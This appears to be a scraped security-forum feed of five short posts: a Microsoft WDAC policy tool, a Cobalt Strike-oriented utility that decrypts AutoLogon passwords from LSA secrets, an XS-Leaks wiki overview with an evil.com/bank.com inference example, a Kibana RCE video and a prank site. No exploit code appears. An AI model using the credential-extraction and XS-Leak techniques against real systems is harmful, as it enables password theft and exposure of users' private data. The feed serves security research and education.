  21. WDAC Policy Wizard The Windows Defender Application Control Wizard (Version 1.6.1) enables IT professionals to build and deploy WDAC code integrity (CI) policies by wrapping the CI PowerShell cmdlets. Use this application to create new base and supplemental policies, in addition to editing and merging exisiting (CI) policies. Getting Started You can install the policy wizard by selecting the download link. Before you install the application: Review the Microsoft open source license for the app. Review the Getting Started instructions on the project's Github repository. Review the change list on the Archives Page. Download the Installer What's new The Windows Defender App Control Wizard Version 1.6.1 offers new functionality and bug fixes. The application is updated multiple times per month. Learn more about the new features in Version 1.6.1 in the WDAC changelog. About the Project The Windows Defender App Control Wizard Version was created by the Microsoft WDAC feature team as part of an ongoing effort to provide enhancing tooling for professionals leveraging WDAC technologies. See the About Page for more information. Sursa: https://webapp-wdac-wizard.azurewebsites.net/
  22. This tool can extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon. I made this to be used with Cobalt Strike's execute-assembly: Compiled with .NET 3.0 (Windows Vista's default)+. Needs to be run as SYSTEM. Not just as a high intgrity process because the special registry keys need are only visible to SYSTEM and can only be decyrpted by SYSTEM. Why? In order to support Kiosk mode Windows needs to keep the user's password in a reversable format. This was being kept at HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon under "DefaultUserName" and "DefaultPassword" . Autologon was updated to store the passwords in the LSA Secrets registry keys that are only visible to SYSTEM. keithga provided a binary that popped a Message but no source code or command line version. How it works Through pInvoke calls: LSAOpenPolicy() LsaRetrievePrivateData() Credits Reverse Engineered this: https://keithga.wordpress.com/2013/12/19/sysinternals-autologon-and-securely-encrypting-passwords/ Copy and Pasted EVERYTHING from here: https://www.pinvoke.net/default.aspx/advapi32/LsaOpenPolicy.html Icon from: https://icon-icons.com/icon/lock-secure-password/99595 SysInternals: https://docs.microsoft.com/en-us/sysinternals/downloads/autologon So thanks to who actually did the work: keithga, frohwalt Download Compiled Version HERE Sursa: https://github.com/securesean/DecryptAutoLogon
  23. XS-Leaks Wiki # Overview # Cross-site leaks (aka XS-Leaks, XSLeaks) are a class of vulnerabilities derived from side-channels 1 built into the web platform. They take advantage of the web’s core principle of composability, which allows websites to interact with each other, and abuse legitimate mechanisms 2 to infer information about the user. One way of looking at XS-Leaks is to highlight their similarity with cross-site request forgery (CSRF 3) techniques, with the main difference being that instead of allowing other websites to perform actions on behalf of a user, XS-Leaks can be used to infer information about a user. Browsers provide a wide variety of features to support interactions between different web applications; for example, they permit a website to load subresources, navigate, or send messages to another application. While such behaviors are generally constrained by security mechanisms built into the web platform (e.g. the same-origin policy), XS-Leaks take advantage of small pieces of information which are exposed during interactions between websites. The principle of an XS-Leak is to use such side-channels available on the web to reveal sensitive information about users, such as their data in other web applications, details about their local environment, or internal networks they are connected to. Cross-site oracles # The pieces of information used for an XS-Leak usually have a binary form and are referred to as “oracles”. Oracles generally answer with YES or NO to cleverly prepared questions in a way that is visible to an attacker. For example, an oracle can be asked: Does the word secret appear in the user’s search results in another web application? This question might be equivalent to asking: Does the query ?query=secret return an HTTP 200 status code? Since it is possible to detect the HTTP 200 status code with Error Events, this has the same effect as asking: Does loading a resource from ?query=secret in the application trigger the onload event? The above query could be repeated by an attacker for many different keywords, and as a result the answers could be used to infer sensitive information about the user’s data. Browsers provide a wide range of different APIs that, while well-intended, can end up leaking small amounts of cross-origin information. They are described in detail throughout this wiki. Example # Websites are not allowed to directly access data on other websites, but they can load resources from them and observe the side effects. For example, evil.com is forbidden from explicitly reading a response from bank.com, but evil.com can attempt to load a script from bank.com and determine whether or not it successfully loaded. Example Suppose that bank.com has an API endpoint that returns data about a user’s receipt for a given type of transaction. evil.com can attempt to load the URL bank.com/my_receipt?q=groceries as a script. By default, the browser attaches cookies when loading resources, so the request to bank.com will carry the user’s credentials. If the user has recently bought groceries, the script loads successfully with an HTTP 200 status code. If the user hasn’t bought groceries, the request fails to load with an HTTP 404 status code, which triggers an Error Event. By listening to the error event and repeating this approach with different queries, the attacker can infer a significant amount of information about the user’s transaction history. In the example above, two websites of two different origins (evil.com and bank.com) interacted through an API that browsers allow websites to use. This interaction didn’t exploit any vulnerabilities in the browser or in bank.com, but it still allowed evil.com to gain information about the user’s data on bank.com. Root cause of XS-Leaks # The root cause of most XS-Leaks is inherent to the design of the web. Oftentimes applications are vulnerable to some cross-site information leaks without having done anything wrong. It is challenging to fix the root cause of XS-Leaks at the browser level because in many cases doing so would break existing websites. For this reason, browsers are now implementing various Defense Mechanisms to overcome these difficulties. Many of these defenses require websites to opt in to a more restrictive security model, usually through the use of certain HTTP headers (e.g. Cross-Origin-Opener-Policy: same-origin), which often must be combined to achieve the desired outcome. We can distinguish different sources of XS-Leaks, such as: Browser APIs (e.g. Frame Counting and Timing Attacks) Browser implementation details and bugs (e.g. Connection Pooling and typeMustMatch) Hardware bugs (e.g. Speculative Execution Attacks 4) A little bit of history # XS-Leaks have long been part of the web platform; timing attacks to leak information about the user’s web activity have been known since at least 2000. This class of issues has steadily attracted more attention 5 as new techniques were found to increase their impact. In 2015, Gelernter and Herzberg published “Cross-Site Search Attacks” 6 which covered their work on exploiting timing attacks to implement high impact XS-Search attacks against web applications built by Google and Microsoft. Since then, more XS-Leak techniques have been discovered and tested. Recently, browsers have implemented a variety of new defense mechanisms that make it easier to protect applications from XS-Leaks. About this wiki # This wiki is meant to both introduce readers to XS-Leaks and serve as a reference guide for experienced researchers exploiting XS-Leaks. While this wiki contains information on many different techniques, new techniques are always emerging. Improvements, whether they add new techniques or expand existing pages, are always appreciated! Find out how you can contribute to this wiki and view the list of contributors in the Contributions article. References # Side Channel Vulnerabilities on the Web - Detection and Prevention, link ↩︎ In some cases, these features are maintained to preserve backwards compatibility. But, in other cases, new features are added to browsers regardless of the fact that they introduce potential cross-site leaks (e.g. Scroll to Text Fragment), as the benefits are considered to outweigh the downsides. ↩︎ Cross Site Request Forgery (CSRF), link ↩︎ Meltdown and Spectre, link ↩︎ Browser Side Channels, link ↩︎ Cross-Site Search Attacks, link ↩︎ Sursa: https://xsleaks.dev/#xs-leaks-wiki
  24. This video is an explanation of prototype pollution vulnerability in kibana that, in a super cool and very creative way, was used to achieve remote code execution in kibana software. Blogpost: https://research.securitum.com/protot... Researcher's twitter: https://twitter.com/SecurityMB Follow me on twitter: https://twitter.com/gregxsunday Timestamps: 00:00 Intro 00:34 Prototype pollution 02:27 Vulnerability discovery 04:14 Exploitation #rce #prototypePollution #cve-2019-7609
  25. Nytro

    Update Faker

    A website that shows "update screen" animations in your browsers, so you can put the browser in fullscreen and prank friends https://updatefaker.com/ F11
×
×
  • Create New...